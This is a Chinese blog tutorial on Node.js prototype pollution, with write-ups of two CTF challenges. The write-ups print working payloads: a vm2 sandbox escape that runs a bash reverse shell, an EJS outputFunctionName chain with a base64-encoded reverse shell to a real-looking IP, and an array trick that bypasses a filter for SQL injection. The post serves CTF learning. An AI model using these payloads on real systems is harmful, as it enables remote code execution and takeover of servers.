NodeJS原型链污染

已于 2023-05-12 00:24:50 修改
阅读量1k 收藏 7
点赞数 2
文章标签: web安全 javascript
于 2023-05-11 19:37:00 首次发布
Aiwin
本文链接:https://blog.csdn.net/weixin_53090346/article/details/130629106
版权

文章目录

前言

NodeJs作为Javascript的一门后端语言,基础比较早就学了,在CTF中原型链污染也算是一个常客了,之前也做过几道原型链污染的题目,但是一直都没有将其整理出来,今天又遇到了,于是就做个记录总结。

关于NodeJS

  1. 基于Chrome V8引擎的Javascript的运行环境,V8相对于火狐的OdinMonkey,Safri浏览器的JSCore都要快。
  2. Node.js是Javascript的后端运行环境,无法调用DOM和BOM等浏览器内置API,仅仅提供了基础的功能和API,这些基础使很多强大的框架出现,可以基于Express框架构建Web应用,基于restify快速构建API项目,可以读写和操作数据库等。
  3. NodeJS可以通过NPM服务器下载别人的第三方包到本地使用,主要通过require引入。

更多基础可参考我的NodeJS学习文章:NodeJS基础

child_process模块

child_process可以看作是nodeJS的一种原生API,它的诞生使得js脚本能够执行shell命令,主要方法有以下。

  1. child_processchild_process.exec(): 衍生 shell 并在该 shell 中运行命令,完成后将 stdout 和 stderr 传给回调函数。
  1. child_process.execFile(): 与 child_process.exec() 类似,不同之处在于,默认情况下,它直接衍生命令,而不先衍生 shell。
  2. child_process.fork(): 衍生新的 Node.js 进程并使用建立的 IPC 通信通道(其允许在父子进程之间发送消息)调用指定的模块。
  3. child_process.execSync(): child_process.exec() 的同步版本,其将阻塞 Node.js 事件循环。
  4. child_process.execFileSync(): child_process.execFile() 的同步版本,其将阻塞 Node.js 事件循环。

比如使用例子:

const process = require("child_process");

//执行whoami命令并输出,会通过回调函数的形式接收stdout
function exec() {
    process.exec('whoami',((error, stdout, stderr) => {
        if(!error){
            console.log(stdout.toString());
        }
    }))

}
//通过on监听命令指向结果
function spawn() {
    process.spawn('more',['node.iml']).stdout.on('data',(data)=>{
        console.log(data.toString());
    })
}
exec()
spawn()

file

相比spawn和exec,都能用于执行一个命令,spawn能够以数组的形式提供参数,exec方法相比spawn方法,提供了回调函数,但是子进程返回给Node的数据流,exec又maxBuffer限制为200K,而spawn则无大小限制。

原型链

javascript的继承关系

众所周知,对象是每一门语言都很重要的东西,各种语言都会存在对象之间的继承,而javascript的继承关系十分独特,它是通过一条原型链的来进行继承的,存在父类子类之分,而javascript在寻找对象的属性时,也遵循这样的一条规则:先在实例化类中查找对应的属性,假若没有,则会从原型链中查找,即它的父类对象,一直向上寻找,直至找不到返回null。

prototype、proto、construct

  1. prototype属性,它是函数独有的,可以将一个函数指向一个对象,即指定函数的原型对象,它是作用就是让所有函数实例化的对象们都可以找到公用的属性和方法。

示例:

function Test() {
    this.data1=8;
    this.data2=9;
}
const test =new Test();
Test.prototype.data3=10;
console.log(test.data1);
console.log(test.data2);
console.log(test.data3);

file

可以看到,通过prototype属性在Test函数的原型对象中创建了data3,赋值为10,用实例化的test类也能够访问到这个公有的属性data3

  1. proto属性,不同于prototype的函数独有,它是对象所独有的,一个对象可以通过__proto__属性将其指向另一个对象即它们的父对象,它的作用就是当访问一个对象属性时,如果该对象的内部不存在这个属性,就会向它的__proto__属性中寻找,不断的往上寻找。

示例:

function Test() {
    this.data1=8;
    this.data2=9;
}
const test =new Test();
test.__proto__.data4=11;
console.log(Test.prototype===test.__proto__);
console.log(test.data4);

file

可以看到test.__proto__与Test.prototype其实是相同的,都指向了原型链中的同一个父类对象。

  1. construct属性,它也是对象独有的,从一个对象指向一个函数,含义就是指向该对象的构造函数,可用于返回创建该对象的函数。
let a, b;
(function(){
    function A (arg1,arg2) {
        this.a = 1;
        this.b=2;
    }

    A.prototype.log = function () {
        console.log(this.a);
    }
    a = new A();
    b = new A();
})()
a.log();
b.log();
//输出 1 1

//因为A在闭包中,不能直接访问A,可以通过constructor给A类添加新方法
a.constructor.prototype.log2 = function () {
    console.log(this.b)
}

a.log2();
b.log2();
//输出 2 2

也正因为Javascript的这种原型链继承关系,所以使得原型链污染的发生。

let test={test:1}
console.log(test.test)
test.__proto__.test=2
console.log(test.test)
let test1 = {}
console.log(test1.test)
//输出1 1 2,可以看到test1在找test属性的时候会从父类Object中寻找,导致属性能够被控制

简单示例

const express=require('express')
const bodyParser = require("body-parser");
const app=express()
app.use(bodyParser.json({ limit: '2mb' }))
app.use(bodyParser.urlencoded({
    extended: false
}))
function copy(object1, object2){
    for (let key in object2) {
        if (key in object2 && key in object1) {
            copy(object1[key], object2[key])
        } else {
            object1[key] = object2[key]
        }
    }
}
app.post('/login',function (req,res) {
    let admin={};
    let flag='flag{this_is_flag}';
    let user={}
    copy(user,req.body)
    if(admin.password==='password'){
        res.end(flag)
    }
    else{
        return res.json({code:2,message:'登录失败'+JSON.stringify(user)});
    }
})

const server = app.listen(8081, function () {
    const {address,port} = server.address();
    console.log("express server running at https://%s:%s", address, port)

});

可以看到admin对象的password属性要为password才输出flag,因此可以通过原型链污染user的父对象,使得admin找password时从父对象寻找,找到password

file

[HZNUCTF 2023 final]eznode

源码如下:

const express = require('express');
const app = express();
const { VM } = require('vm2');

app.use(express.json());

const backdoor = function () {
    try {
        new VM().run({}.shellcode);
    } catch (e) {
        console.log(e);
    }
}

const isObject = obj => obj && obj.constructor && obj.constructor === Object;
const merge = (a, b) => {
    for (var attr in b) {
        if (isObject(a[attr]) && isObject(b[attr])) {
            merge(a[attr], b[attr]);
        } else {
            a[attr] = b[attr];
        }
    }
    return a
}
const clone = (a) => {
    return merge({}, a);
}


app.get('/', function (req, res) {
    res.send("POST some json shit to /.  no source code and try to find source code");
});

app.post('/', function (req, res) {
    try {
        console.log(req.body)
        var body = JSON.parse(JSON.stringify(req.body));
        var copybody = clone(body)
        if (copybody.shit) {
            backdoor()
        }
        res.send("post shit ok")
    }catch(e){
        res.send("is it shit ?")
        console.log(e)
    }
})

app.listen(3000, function () {
    console.log('start listening on port 3000');
});

可以看到引入了VM2沙箱执行一段shellcode,以隔离环境,并且通过clone调用了merge方法,如果body中存在shit等于1,则执行backdoor方法,因此可以通过原型链去污染shellcode,然后通过VM2的沙箱逃逸,进行RCE。

{"shit":1,"__proto__":{"shellcode":"let res = import('./app.js'); res.toString.constructor(\"return this\") ().process.mainModule.require(\"child_process\").execSync('bash -c \"bash -i >& /dev/tcp/ip/port 0>&1\"').toString();"}}

file

[GKCTF2021]easynode

附件直接给了源码:

const express = require('express');
const format = require('string-format');
const { select,close } = require('./tools');
const app = new express();
var extend = require("js-extend").extend
const ejs = require('ejs');
const {generateToken,verifyToken}  = require('./encrypt');
var cookieParser = require('cookie-parser');
app.use(express.urlencoded({ extended: true }));
app.use(express.static((__dirname+'/public/')));
app.use(cookieParser());

const decode = (str) =>{
    str = str.replace(/\'/g,'\\\'');
    return str;
}

let safeQuery =  async (username,password)=>{

    const waf = (str)=>{
        blacklist = ['\\','\^',')','(','\"','\'']
        blacklist.forEach(element => {
            if (str == element){
                str = "*";
            }
        });
        return str;
    }

    const safeStr = (str)=>{ for(let i = 0;i < str.length;i++){
        if (waf(str[i]) =="*"){
            
            str =  str.slice(0, i) + "*" + str.slice(i + 1, str.length);
        }
        
    }
    return str;
    }

    username = safeStr(username);
    password = safeStr(password);
    let sql = format("select * from test where username = '{}' and password = '{}'",username.substr(0,20),password.substr(0,20));
    result = JSON.parse(JSON.stringify(await select(sql)));
    return result;
}

app.get('/', async(req,res)=>{
    const html = await ejs.renderFile(__dirname + "/public/index.html")
    res.writeHead(200, {"Content-Type": "text/html"});
    res.end(html)
})
    

app.post('/login',function(req,res,next){

    let username = req.body.username;
    let password = req.body.password;
    safeQuery(username,password).then(
        result =>{
            if(result[0]){
                const token = generateToken(username)
                res.json({
                    "msg":"yes","token":token
                });
            }
            else{
                res.json(
                    {"msg":"username or password wrong"}
                    );
            }
        }
    ).then(close()).catch(err=>{res.json({"msg":"something wrong!"});});
  })
 

app.get("/admin",async (req,res,next) => {
    const token = req.cookies.token
    let result = verifyToken(token);
    if (result !='err'){
        username = result
        var sql = `select board from board where username = "${username}"`;
        
        var query = JSON.parse(JSON.stringify(await select(sql).then(close())));  
        
        board = JSON.parse(query[0].board);
        const html = await ejs.renderFile(__dirname + "/public/admin.ejs",{board,username})
        res.writeHead(200, {"Content-Type": "text/html"});
        res.end(html)
    } 
    else{
        res.json({'msg':'stop!!!'});
    }
});
  
app.post("/addAdmin",async (req,res,next) => {
    let username = req.body.username;
    let password = req.body.password;
    const token = req.cookies.token
    let result = verifyToken(token);
    if (result !='err'){
        gift = JSON.stringify({ [username]:{name:"Blue-Eyes White Dragon",ATK:"3000",DEF:"2500",URL:"https://ftp.bmp.ovh/imgs/2021/06/f66c705bd748e034.jpg"}});
        var sql = format('INSERT INTO test (username, password) VALUES ("{}","{}") ',username,password);
        select(sql).then(close()).catch( (err)=>{console.log(err)}); 
        var sql = format('INSERT INTO board (username, board) VALUES (\'{}\',\'{}\') ',username,gift);
        select(sql).then(close()).catch( (err)=>{console.log(err)});
        res.end('add admin successful!')
    }
    else{
        res.end('stop!!!');
    }
});


app.post("/adminDIV",async(req,res,next) =>{
    const token = req.cookies.token
    
    var data =  JSON.parse(req.body.data)
    
    let result = verifyToken(token);
    if(result !='err'){
        username = result;
        var sql =`select board from board where username = "${username}"`;
        var query = JSON.parse(JSON.stringify(await select(sql).then(close().catch( (err)=>{console.log(err);} )))); 
        
        board = JSON.parse(JSON.stringify(query[0].board));
        for(var key in data){
            var addDIV =`{"${username}":{"${key}":"${(data[key])}"}}`;
            extend({},JSON.parse(addDIV));
        }
        sql = `update board SET board = '${JSON.stringify(board)}' where username = '${username}'`
        select(sql).then(close()).catch( ()=>{res.json({"msg":'DIV ERROR?'});}); 
        res.json({"msg":'addDiv successful!!!'});
    }
    else{
        res.end('nonono');
    }
});


app.listen(1337, () => {
    console.log(`App listening at port 1337`)
})

仔细看一下源码,很明显原型链渲染的点就在extend({},JSON.parse(addDIV));这个地方,仔细看一下出题人的提示js文件,可以看到这里的username为_proto_,也就是说adminDIV中token认证的用户名为_proto_,意味中我们要创建这个用户,而在addAdmin路由中,可以创建用户,因此需要知道admin的token然后创建__proto__用户,最后通过__ptoto__用户登入admin中,最后通过__proto__登入admin路由,通过board渲染,触发RCE。

并且出题人直接在test.js中直接给出了链:

var jsExtend = require("js-extend")
var obj = {"123":"saddas"}
var malicious_payload = '{"__proto__":{"outputFunctionName":"x;console.log(1);process.mainModule.require(\'child_process\').exec(\'calc\');x","name":"123"}}';
console.log(malicious_payload);
console.log("Before: " + {}.outputFunctionName);
jsExtend.extend(obj, JSON.parse(malicious_payload));
console.log("After : " + {}.outputFunctionName);

// app.get('/test',async (req,res)=>{

//     username="__proto__";
//     board ='{"__proto__":{"outputFunctionName":"x;console.log(1);process.mainModule.require(\'child_process\').exec(\'calc\');x"}}'
//     extend({},JSON.parse(board));
//     console.log({}.outputFunctionName);
//     console.log(JSON.stringify(board));
//     const html = await ejs.renderFile(__dirname + "/public/admin.ejs",{board,username})
//     res.writeHead(200, {"Content-Type": "text/html"});
//     res.end(html)
// })

首先要解决的问题就是如何进行admin登录获取token,可以看到在waf中过滤了一些特殊字符,然后却使用slice()进行了拼接,可以使用数组进行绕过。

const waf = (str) => {
        blacklist = ['\\', '\^', ')', '(', '\"', '\'']
        blacklist.forEach(element => {
            if (str == element) {
                str = "*";
            }
        });
        return str;
    }
const safeStr = (str) => {
        for (let i = 0; i < str.length; i++) {
            if (waf(str[i]) == "*") {

                str = str.slice(0, i) + "*" + str.slice(i + 1, str.length);
            }

        }
        return str;
    }
username=["admin' or 1 #",1,1,1,1,1,1,1,"("]
u = safeStr(username);
console.log(u)

file

这样单引号就被逃逸了出来,可以完成登录的绕过,这里多余的字符要足够多,以至能够将循环的时候能直接将admin’作为整体,'就出来了。

  1. 使用admin绕过进行登录获取token
    file

  2. 通过获得的admin的token进入addAdmin注册__proto__用户
    file

  3. 通过账号密码登录__proto__获得token,然后通过这个token进入adminDIV,传入触发链
    file

data={"outputFunctionName":"x2;global.process.mainModule.require('child_process').exec('echo%20YmFzaCAtYyAnYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMjAuNzkuMjkuMTcwLzY2NjYgMD4mMSc%3D%7Cbase64%20-d%7Cbash');var x1"}

  1. 使用__proto__进入admin触发链条,进行RCE
    file

  2. 反弹shell成功
    file

总结

文章只做原型链污染的初了解,以后遇到原型链的题目会不断的进行添加。

M03-Aiwin
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
node学习笔记04 模块(附加js原型学习解释)
qq_39303334的博客
11-15 163
1.外部访问局部变量,函数。 NodeJS包可以向外暴露很多需要的变量,函数等语法:    exports.msg = msg;    exports.showinfo = showinfo; 使用者只需要需要接受整个包,相当于增加了一个顶层变量: var foo = require(“./ test / foo.js”) 执行的执行console.log(foo.js)    默认...
hznuCTF eznode
m0_64348326的博客
07-04 213
4.谷歌搜索该漏洞的exp:https://xz.aliyun.com/t/11859#toc-5。然后json格式发送即可。2.审计源码,挺简单的。大概就是在页面post传递一个json数据,会经过。变量中,最后判断该变量的shit值是否为真,然后调用。属性的内容,那么也就是我们需要将该属性污染成。1.页面提示尝试查看源码,最直观的就是。配置错误造成的源码泄露了,直接访问。函数很明显的一个原型污染,而。函数在VM2沙箱中执行。函数解析,然后再通过。
原型污染,nodejs逃逸例子
bo1029的博客
08-02 874
这个原因就是因为primitive types,数字、字符串、布尔等这些都是primitive types,他们的传递其实传递的是值而不是引用,所以在沙盒内虽然你也是使用的m,但是这个m和外部那个m已经不是一个m了,所以也是无法利用的。这两个的一个重要区别就是,{}是在沙盒内的一个对象,而this是在沙盒外的对象(注入进来的)。如果能理解这一点,后面就可以很好的理解沙箱绕过的核心原理了:只要我们能在沙箱内部,找到一个沙箱外部的对象,借助这个对象内的属性即可获得沙箱外的函数,进而绕过沙箱。
nodejs——原型污染
最新发布
m0_73756016的博客
06-12 928
参考滑动验证页面。
nodejs原型污染
yink12138的博客
01-10 3321
nodejs原型污染
【Web】NodeJs相关例题wp
uuzeray的博客
11-21 353
浏览器内部使用32位带符号的整数来储存推迟执行的时间这意味着setTimeout最多延迟2147483647ms。只要大于2147483647,就会发生溢出,就可以绕过那个时间限制,进入下一个路由。根据读到的package包引用,发现lodash版本为4.17.16。我们传入一个delay和原先定义的60000进行比较。大的值复制给delay。简单审一下,污染system_open为yes就可以拿flag。但是我们的代码不能超时6秒。表单提交个D0g3_Yes!给到版本号,敏感的weber已经有想法了(
nodejs实现websocket
03-07
nodejs实现websocket服务端和客户端,服务端会定时发送消息到客户端 下载文件 进入文件夹根目录 运行`npm install` 运行websocket服务端`node ws.js` 运行websocket客户端`node ws-client.js`
nodejs14.9.0
10-30
nodejs14.9.0
nodeJs链接Mysql做增删改查的简单操作
10-20
本篇文章主要介绍了nodeJs链接Mysql做增删改查的简单操作,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
nodejs11.zip
02-19
nodejs11安装文件,解决win7操作系统nodeJs环境搭建失败问题:Node.js is only supported on Windows 8.1, Windows Server 2012 R2, or higher
NodeJS-技术讲解
08-21
NodeJS 介绍与应用 Node.js 是一个基于 Chrome JavaScript 运行时建立的一个平台, Node.js 是一个事件驱动 I/O 服务端 JavaScript 环境(由 C++ 编写),基于 Google 的 V8 引擎,V8 引擎执行 JavaScript 的速度...
原型污染
m0_62422842的博客
06-06 2257
原型污染是一个关于前端js的相关漏洞,原型污染可拆分为两部分,什么是原型链,又如何进行污染
原型污染 --- 2022.04ctf
m0_63069714的博客
03-15 626
所以我们需要去修改devSettings.root的属性,网上追溯,如果要走到这个流程,必须改使得checkHost( )的值为ture,才能够进入merge方法中,对devSettings对象的值进行修改。JavaScript中,数组的下标可以用字符或是字符串数字来取值,所以在原型链中,我们可以给[ ]对象添加一个名称为1的属性,这样temp再通过下标1取值的时候,实际上取到的是数组中属性为1的值。接下来要做的,就是继续去替换devSettings.root的值了,替换body中的即可。
HZNUCTF2023部分wp-Reverse
m0_73393932的博客
04-04 733
逆向
JavaScript Prototype污染攻击(CTF 例题分析)
a3320315的博客
11-03 1962
0x01 先谈谈自己的理解 function a(){} var b=new a() var c = {} a.__proto__.__proto__ == b.__proto__.__proto__ == c.__proto__ a.__proto__ != b.__proto__ != c 这个时候 b的__proto__ 指向的就是a.prototype a.prototype的_...
Nodejs原型污染
qq_61768489的博客
02-05 596
Nodejs原型污染例题解析
【web安全】Nodejs原型污染分析
「 虚幻私塾」
02-14 683
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 Nodejs原型污染分析 什么是js原型? 可以将js原型理解为其他OOP语言中的类,但还是有细微区别。 1. function F(){...} 2. var f = new F(); 分析: 1.创建一个func F,同时创立了一个F对象(该对象默认是接着Object的原
[WEB/Nodejs]Nodejs原型污染初窥
車鈊的博客
04-06 1096
文章目录原型污染原型污染-前置内容:对象的构造三种方法和原型原型污染-前置内容:原型链的继承原型污染原理原型污染手段入门示例 原型污染 原型污染-前置内容:对象的构造三种方法和原型 对类原型操作的prototype 对对象的类原型操作的__proto__ function Foo() { this.name = '小红' } Foo.prototype.id = 123 Foo.prototype.printl = function printl() { console.log
node.js原型污染漏洞
weixin_43610673的博客
02-27 2311
node.js入门:http://nodejs.cn/learn/how-much-javascript-do-you-need-to-know-to-use-nodejs 根据上面说明要掌握的JavaScript部分直接看菜鸟教程学。 对象与原型链 JavaScript当中的所有事物都是对象:字符串、数值、数组、函数。对象只是一种特殊的数据。对象拥有属性和方法。 可以这样创建一个对象 var person = {firstName:"John", lastName:"Doe", age:50, eyeCo
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

M03-Aiwin

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值